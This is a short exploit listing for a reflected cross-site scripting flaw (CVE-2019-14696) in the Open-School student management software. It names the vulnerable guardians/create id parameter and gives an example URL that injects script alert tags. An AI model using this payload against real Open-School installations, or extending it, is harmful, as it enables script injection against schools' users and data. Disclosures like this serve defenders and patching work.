Exploit for Open-School 3.0 / Community Edition 2.3 Cross Site Scripting CVE-2019-14696

Name: Exploit for Open-School 3.0 / Community Edition 2.3 Cross Site Scripting CVE-2019-14696
Rating: 5 (61 reviews)

2019-08-08 | CVSS -0.0

## https://sploitus.com/exploit?id=PACKETSTORM:153984
# Exploit Title: [title]  
# Date: [2019 08 06]  
# Exploit Author: [Greg.Priest]  
# Vendor Homepage: [https://open-school.org/]  
# Software Link: []  
# Version: [Open-School 3.0/Community Edition 2.3]  
# Tested on: [Windows/Linux ]  
# CVE : [CVE-2019-14696]  
  
  
Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.  
  
/index.php?r=students/guardians/create&id=1[inject JavaScript Code]  
  
Example:  
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>